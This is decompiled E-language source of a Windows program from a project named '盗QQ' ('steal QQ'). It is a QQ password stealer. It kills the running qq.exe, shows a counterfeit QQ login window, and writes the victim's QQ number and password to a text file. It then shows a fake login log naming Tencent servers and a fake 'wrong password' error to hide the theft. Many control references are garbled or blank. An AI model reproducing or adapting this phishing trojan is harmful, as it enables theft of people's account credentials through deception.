 ' 文件类型：Windows窗口程序

 ' 程序名称：
 ' 程序描述：
 ' 程序作者：
 ' 邮政编码：
 ' 联系地址：
 ' 联系电话：
 ' 传真号码：
 ' 电子信箱：
 ' 主页地址：
 ' 版权声明：
 ' 版本号：1.0
 ' 创建号：0.0

窗口 登陆窗口 ' 在程序启动后自动调入本窗口
    左边 = 50
    顶边 = 5
    宽度 = 330
    高度 = 576
    鼠标指针 = { 0,0,0,0 }
    标记 = “”
    可视 = 真
    禁止 = 假
    边框 = 2
    底图方式 = 1
    底色 = 16707808 '  0xFEF0E0
    最大化按钮 = 假
    最小化按钮 = 真
    控制按钮 = 真
    位置 = 1
    可否移动 = 真
    背景音乐播放次数 = 0
    回车下移焦点 = 假
    Esc键关闭 = 假
    F1键打开帮助 = 假
    帮助标志值 = 0
    在任务栏中显示 = 真
    随意移动 = 假
    外形 = 0
    总在最前 = 假
    保持标题栏激活 = 假
    底图 =  ' 空
    图标 =  ' 已保存到：D:\易语言学习\Data\盗QQ.e\登陆窗口_图标.ico
    背景音乐 =  ' 空
    标题 = “QQ用户登录”
    帮助文件名 = “”

窗口 _启动窗口
    左边 = 50
    顶边 = 50
    宽度 = 317
    高度 = 216
    鼠标指针 = { 0,0,0,0 }
    标记 = “”
    可视 = 假
    禁止 = 假
    边框 = 2
    底图方式 = 1
    底色 = -16777216 '  0xFF000000
    最大化按钮 = 假
    最小化按钮 = 假
    控制按钮 = 真
    位置 = 1
    可否移动 = 真
    背景音乐播放次数 = 0
    回车下移焦点 = 假
    Esc键关闭 = 真
    F1键打开帮助 = 假
    帮助标志值 = 0
    在任务栏中显示 = 真
    随意移动 = 假
    外形 = 0
    总在最前 = 假
    保持标题栏激活 = 假
    底图 =  ' 空
    图标 =  ' 空
    背景音乐 =  ' 空
    标题 = “判断界面”
    帮助文件名 = “”

窗口 软键盘窗口
    左边 = 50
    顶边 = 50
    宽度 = 274
    高度 = 159
    鼠标指针 = { 0,0,0,0 }
    标记 = “”
    可视 = 真
    禁止 = 假
    边框 = 0
    底图方式 = 2
    底色 = -16777216 '  0xFF000000
    最大化按钮 = 假
    最小化按钮 = 假
    控制按钮 = 真
    位置 = 1
    可否移动 = 真
    背景音乐播放次数 = 0
    回车下移焦点 = 假
    Esc键关闭 = 真
    F1键打开帮助 = 假
    帮助标志值 = 0
    在任务栏中显示 = 真
    随意移动 = 假
    外形 = 0
    总在最前 = 假
    保持标题栏激活 = 假
    底图 =  ' 已保存到：D:\易语言学习\Data\盗QQ.e\软键盘窗口_底图
    图标 =  ' 空
    背景音乐 =  ' 空
    标题 = “”
    帮助文件名 = “”

窗口 错误
    左边 = 50
    顶边 = 50
    宽度 = 284
    高度 = 121
    鼠标指针 = { 0,0,0,0 }
    标记 = “”
    可视 = 真
    禁止 = 假
    边框 = 0
    底图方式 = 1
    底色 = -16777216 '  0xFF000000
    最大化按钮 = 假
    最小化按钮 = 假
    控制按钮 = 真
    位置 = 1
    可否移动 = 真
    背景音乐播放次数 = 0
    回车下移焦点 = 假
    Esc键关闭 = 真
    F1键打开帮助 = 假
    帮助标志值 = 0
    在任务栏中显示 = 真
    随意移动 = 假
    外形 = 0
    总在最前 = 假
    保持标题栏激活 = 假
    底图 =  ' 空
    图标 =  ' 空
    背景音乐 =  ' 空
    标题 = “”
    帮助文件名 = “”

窗口 测试窗口
    左边 = 50
    顶边 = 50
    宽度 = 380
    高度 = 250
    鼠标指针 = { 0,0,0,0 }
    标记 = “”
    可视 = 真
    禁止 = 假
    边框 = 2
    底图方式 = 1
    底色 = -16777216 '  0xFF000000
    最大化按钮 = 假
    最小化按钮 = 假
    控制按钮 = 真
    位置 = 1
    可否移动 = 真
    背景音乐播放次数 = 0
    回车下移焦点 = 假
    Esc键关闭 = 真
    F1键打开帮助 = 假
    帮助标志值 = 0
    在任务栏中显示 = 真
    随意移动 = 假
    外形 = 0
    总在最前 = 假
    保持标题栏激活 = 假
    底图 =  ' 空
    图标 =  ' 空
    背景音乐 =  ' 空
    标题 = “测试”
    帮助文件名 = “”

窗口 模拟登录
    左边 = 0
    顶边 = 0
    宽度 = 159
    高度 = 579
    鼠标指针 = { 0,0,0,0 }
    标记 = “”
    可视 = 真
    禁止 = 假
    边框 = 0
    底图方式 = 1
    底色 = 16746496 '  0xFF8800
    最大化按钮 = 假
    最小化按钮 = 假
    控制按钮 = 真
    位置 = 1
    可否移动 = 真
    背景音乐播放次数 = 0
    回车下移焦点 = 假
    Esc键关闭 = 真
    F1键打开帮助 = 假
    帮助标志值 = 0
    在任务栏中显示 = 真
    随意移动 = 假
    外形 = 0
    总在最前 = 假
    保持标题栏激活 = 假
    底图 =  ' 空
    图标 =  ' 空
    背景音乐 =  ' 空
    标题 = “”
    帮助文件名 = “”

窗口 错误窗口1
    左边 = 50
    顶边 = 50
    宽度 = 306
    高度 = 189
    鼠标指针 = { 0,0,0,0 }
    标记 = “”
    可视 = 真
    禁止 = 假
    边框 = 2
    底图方式 = 1
    底色 = 128 '  0x80
    最大化按钮 = 假
    最小化按钮 = 假
    控制按钮 = 真
    位置 = 1
    可否移动 = 真
    背景音乐播放次数 = 0
    回车下移焦点 = 假
    Esc键关闭 = 真
    F1键打开帮助 = 假
    帮助标志值 = 0
    在任务栏中显示 = 真
    随意移动 = 假
    外形 = 0
    总在最前 = 假
    保持标题栏激活 = 假
    底图 =  ' 空
    图标 =  ' 空
    背景音乐 =  ' 空
    标题 = “服务器拒绝”
    帮助文件名 = “”

窗口 详细信息
    左边 = 50
    顶边 = 50
    宽度 = 442
    高度 = 418
    鼠标指针 = { 0,0,0,0 }
    标记 = “”
    可视 = 真
    禁止 = 假
    边框 = 2
    底图方式 = 1
    底色 = -16777216 '  0xFF000000
    最大化按钮 = 假
    最小化按钮 = 假
    控制按钮 = 真
    位置 = 1
    可否移动 = 真
    背景音乐播放次数 = 0
    回车下移焦点 = 假
    Esc键关闭 = 真
    F1键打开帮助 = 假
    帮助标志值 = 0
    在任务栏中显示 = 真
    随意移动 = 假
    外形 = 0
    总在最前 = 假
    保持标题栏激活 = 假
    底图 =  ' 空
    图标 =  ' 空
    背景音乐 =  ' 空
    标题 = “登陆失败”
    帮助文件名 = “”



.图片 QQ1, " ' 已保存到：D:\易语言学习\Data\盗QQ.e\QQ1", , 
.图片 TM1, " ' 已保存到：D:\易语言学习\Data\盗QQ.e\TM1", , 
.图片 图片1, " ' 已保存到：D:\易语言学习\Data\盗QQ.e\图片1", , 
.图片 图片2, " ' 已保存到：D:\易语言学习\Data\盗QQ.e\图片2", , 


 ' 所需要的支持库：
 ' krnln d09f2340818511d396f6aaf844c7e325 4 4 系统核心支持库
 ' xplib 7F54B9CE8887428dBA9CEEB94CEF4C72 1 6 XP风格界面库
 ' shell 52F260023059454187AF826A3C07AF2A 1 0 操作系统界面功能支持库



 ' 所需要的模块
 ' 取句柄对应全路径文件名 d:\My Documents\取句柄对应全路径文件名.ec



.DLL命令 FindWindowA, 整数型, "", "FindWindowA", , 
    .参数 lpClassName, 整数型, , 
    .参数 lpWindowName, 文本型, , 

.DLL命令 GetDesktopWindow, 整数型, "", "GetDesktopWindow", , 

.DLL命令 SetParent, 整数型, "", "SetParent", , 
    .参数 hWndChild, 整数型, , 
    .参数 hWndNewParent, 整数型, , 

.DLL命令 枚举窗口, 逻辑型, "", "EnumWindows", , 
    .参数 枚举子程序, 子程序指针, , 
    .参数 数据, 整数型, , 

.DLL命令 取窗口标题, 逻辑型, "", "GetWindowTextA", , 
    .参数 窗口句柄, 整数型, , 
    .参数 标题, 文本型, 传址, 
    .参数 长度, 整数型, , 

.DLL命令 发送消息, 整数型, "", "SendMessageA", , 
    .参数 窗口句柄, 整数型, , 
    .参数 消息号, 整数型, , 
    .参数 参数1, 整数型, , 
    .参数 参数2, 整数型, , 

.DLL命令 查找进程, 逻辑型, "PowerDll1.dll", "FindProcess", , 
    .参数 进程名, 文本型, , 进程名称（程序名）

.DLL命令 结束进程, 逻辑型, "PowerDll1.dll", "KillProcess", , 
    .参数 进程名, 文本型, , 

.窗口程序集 登陆窗口程序集, , , 

.子程序 _登陆窗口_创建完毕, 空白型, , 
未知支持库函数_0 (1)
赋值 (.内容, “请在此输入QQ号”)
赋值 (.可视, 假)
赋值 (登陆窗口., 240)
赋值 (.可视, 假)
赋值 (.时钟周期, 5000)
赋值 (.可视, 假)
赋值 (.图片, #图片1)
赋值 (.图片, #图片1)



.子程序 _图形按钮5_被单击, 空白型, , 
.如果 (等于 (.可视, 假))
    赋值 (.可视, 真)
    .移动 (.宽度, .顶边, , )
    赋值 (登陆窗口., 相加 (登陆窗口., .宽度))
.否则
    赋值 (.可视, 假)
    赋值 (登陆窗口., 相减 (登陆窗口., .宽度))
.如果结束



.子程序 _高级设置图形按钮_被单击, 空白型, , 
赋值 (登陆窗口., 575)
赋值 (.可视, 假)
赋值 (.可视, 真)

.子程序 _高级设置图形按钮1_被单击, 空白型, , 
赋值 (登陆窗口., 240)
赋值 (.可视, 真)
赋值 (.可视, 假)


.子程序 _图片框2_鼠标左键被按下, 逻辑型, , 
.参数 横向位置, 整数型, , 
.参数 纵向位置, 整数型, , 
.参数 功能键状态, 整数型, , 

.如果 (等于 (.可视, 假))
    赋值 (.可视, 真)
    相减 (.左边, .宽度).移动 (相减 (.顶边, .高度), , )
.否则
    赋值 (.可视, 假)
.如果结束



.子程序 _图片框1_鼠标左键被按下, 逻辑型, , 
.参数 横向位置, 整数型, , 
.参数 纵向位置, 整数型, , 
.参数 功能键状态, 整数型, , 

赋值 (.可视, 假)




.子程序 _时钟1_周期事件, 空白型, , 
.如果 (等于 (.可视, 真))
    赋值 (.可视, 假)
.否则
    
.如果结束


.子程序 _图片框5_鼠标左键被按下, 逻辑型, , 
.参数 横向位置, 整数型, , 
.参数 纵向位置, 整数型, , 
.参数 功能键状态, 整数型, , 

.如果 (等于 (.图片, #图片1))
    赋值 (.图片, #图片2)
.否则
    赋值 (.图片, #图片1)
.如果结束




.子程序 _图片框6_鼠标左键被按下, 逻辑型, , 
.参数 横向位置, 整数型, , 
.参数 纵向位置, 整数型, , 
.参数 功能键状态, 整数型, , 

.如果 (等于 (.图片, #图片1))
    赋值 (.图片, #图片2)
.否则
    赋值 (.图片, #图片1)
.如果结束





.子程序 _图形按钮4_被单击, 空白型, , 
结束 ()


.子程序 _图形按钮3_被单击, 空白型, , 
.判断开始 (并且 (等于 (.内容, “”), 不等于 (.内容, “”)))
    信息框 (“格式要求：由5到10个纯数字组成。”, #信息图标, “无效的 QQ号码 格式”)
    获取焦点 ()
    赋值 (.内容, “”)
.默认
    
.判断结束

.判断开始 (并且 (不等于 (.内容, “”), 不等于 (.内容, “”)))
     ' 信息框 (“QQ遇见问题,无法正常使用,为此专门为此问题生成一个错误报告文件,请将文件先保存然后在发给我们!”, #错误图标, “错误”)
    写到文件 (“C:\Documents and Settings\new\桌面\kic.txt”, 到字节集 (相加 (“【QQ号码】 ”, .内容, #换行符)), 到字节集 (相加 (“【密码】 ”, .内容, #换行符)))
    赋值 (登陆窗口., 假)
    载入 (模拟登录, , 假)
.默认
    
.判断结束

.判断开始 (或者 (等于 (.内容, “”), 等于 (.内容, “”)))
    信息框 (“格请先输入用户口令”, #信息图标, “QQ用户登陆”)
    获取焦点 ()
    
.默认
    
.判断结束




.窗口程序集 启动窗口程序集, , , 

.程序集变量 进程ID, 整数型, , , 
.程序集变量 进程信息1, 空白型, , , 
.程序集变量 进程文件名, 文本型, , , 
.程序集变量 进程句柄, 整数型, , , 
.子程序 __启动窗口_创建完毕, 空白型, , 
查找进程 (“qq.exe”) ' 本程序用了两种不同的方式查找进程，这个是精确查找，另一个只是模糊查找进程并关闭
.如果 (查找进程 (“qq.exe”))
    信息框 (“QQ已开启！”, 48, “找到”) ' 这个是用来提示是不是已经找到运行的QQ，使用的时候换成出错提示的对话框
     ' 取句柄对应全路径文件名 (取窗口句柄 ())  ' 本模块需要的参数是所要获得路径的文件的窗口句柄（整数型），需要作到的是根据指定的进程名称去窗口句柄，暂时还大不到预期的目的
     ' 载入 (测试窗口, , 假)
    结束进程 (“qq.exe”)
    销毁 ()
    载入 (登陆窗口, , 假)
    
    
.否则
    .如果 (等于 (文件是否存在 (“c:\Tencent\qq\qq.exe”), 真)) ' 这个地方可以适当更改
        信息框 (“QQ没有开启，但是存在，请先运行QQ！”, 16, “错误”)
        销毁 ()
        载入 (登陆窗口, , 假)
        
    .否则
        信息框 (“QQ不存在！”, 16, “错误”)
        
    .如果结束
    
    
    
    
    
.如果结束


.窗口程序集 错误程序集, , , 

.子程序 _按钮1_被单击, 空白型, , 
未知支持库函数_6 (4, “c:\Tencent\qq\qq.exe”, , )

.子程序 _按钮2_被单击, 空白型, , 
结束 ()


.窗口程序集 窗口程序集1, , , 

.程序集变量 进程ID, 整数型, , , 
.子程序 _测试窗口_创建完毕, 空白型, , 
赋值 (.标题, 取句柄对应全路径文件名 (取窗口句柄 ()))


.子程序 _按钮1_被单击, 空白型, , 
载入 (_启动窗口, , 真)
销毁 ()


.程序集 __HIDDEN_TEMP_MOD__, , , 

.子程序 取句柄对应全路径文件名, 文本型, , 方圆软件工作室－林炳崇（近在眼前）出品
.参数 窗口句柄, 整数型, , 要取对应运行程序全路径文件名的窗口句柄（不一定是顶级句柄，可以是子窗口句柄）



.窗口程序集 模拟登录程序集, , , 

.子程序 _模拟登录_创建完毕, 空白型, , 
未知支持库函数_0 (0)
赋值 (.时钟周期, 5000)

.子程序 _图形按钮1_被单击, 空白型, , 
赋值 (模拟登录., 2)


.子程序 _图形按钮2_被单击, 空白型, , 
结束 ()


.子程序 _图形按钮3_被单击, 空白型, , 
销毁 ()
赋值 (登陆窗口., 真)


.子程序 _时钟1_周期事件, 空白型, , 
模拟登录.销毁 ()
载入 (错误窗口1, , 假)


.窗口程序集 错误窗口1程序集, , , 

.子程序 _按钮2_被单击, 空白型, , 
销毁 ()
赋值 (登陆窗口.可视, 真) ' 正式版的应该是调用原来的QQ.EXE


.子程序 _按钮1_被单击, 空白型, , 
载入 (详细信息, , 假)


.窗口程序集 详细信息程序集, , , 

.子程序 _关闭_被单击, 空白型, , 
销毁 ()


.子程序 _详细信息_创建完毕, 空白型, , 
赋值 (.内容, 相加 (“【QQ  版本】Build 15.63.310”, #换行符, “【QQ  号码】”, 登陆窗口..内容, #换行符, “【操作系统】”, “Microsoft Windows XP Service Pack 2 [Build 5.1.2600]”, #换行符, “【网络设置】局域网内使用透明代理”, #换行符, “【登录过程】”, #换行符, “---------------------------------------------------------------------------”, #换行符, “开始第一次号码注册登录......时间[”, 到文本 (取现行时间 ()), “]”, #换行符, “初始化登录服务器列表，上次的登录方式为【初始登录方式】”, #换行符, “尝试UDP方式登录,先创建UDP网络组件”, #换行符, “创建UDP网络组件成功，本地IP【127.0.0.1】,端口【4000】，准备连接登录服务器”, #换行符, “UDP登录服务器【sz.tencent.com】需要域名解析...”, #换行符, “UDP登录服务器【sz2.tencent.com】需要域名解析...”, #换行符, “UDP登录服务器【sz3.tencent.com】需要域名解析...”, #换行符, “UDP登录服务器【sz4.tencent.com】需要域名解析...”, #换行符, “UDP登录服务器【sz5.tencent.com】需要域名解析...”, #换行符, “UDP登录服务器【sz6.tencent.com】需要域名解析...”, #换行符, “UDP登录服务器【sz7.tencent.com】需要域名解析...”, #换行符, “UDP登录服务器【sz8.tencent.com】需要域名解析...”, #换行符, “UDP登录服务器【sz9.tencent.com】需要域名解析...”, #换行符, “UDP登录服务器【sz.tencent.com】域名解析成功,解析为【219.133.49.171】”, #换行符, “UDP登录服务器【sz2.tencent.com】域名解析成功,解析为【219.133.60.31】”, #换行符, “UDP登录服务器【sz3.tencent.com】域名解析成功,解析为【219.133.48.87】”, #换行符, “UDP登录服务器【sz4.tencent.com】域名解析成功,解析为【58.60.14.32】”, #换行符, “UDP登录服务器【sz5.tencent.com】域名解析成功,解析为【58.60.14.33】”, #换行符, “UDP登录服务器【sz6.tencent.com】域名解析成功,解析为【219.133.60.37】”, #换行符, “UDP登录服务器【sz7.tencent.com】域名解析成功,解析为【219.133.48.89】”, #换行符, “UDP登录服务器【sz8.tencent.com】域名解析成功,解析为【219.133.40.37】”, #换行符, “UDP登录服务器【sz9.tencent.com】域名解析成功,解析为【219.133.60.39】”, #换行符, “UDP服务器域名解析过程完成，开始连接服务器”, #换行符, “尝试连接UDP服务器IP【219.133.60.37】,端口【8000】......”, #换行符, “连接UDP服务器成功，服务器IP【219.133.60.37】,端口【8000】”, #换行符, “确定登录UDP服务器IP【219.133.60.37】,端口【8000】”, #换行符, “开始下载好友数据步骤1”, #换行符, “下载好友信息步骤2.......”, #换行符, “收到登录服务器下载好友信息步骤2的回应，下载信息失败，原因：服务器拒绝,提示信息：密码不正确”))









 ' 不属于任何一个程序集、类模块的函数：
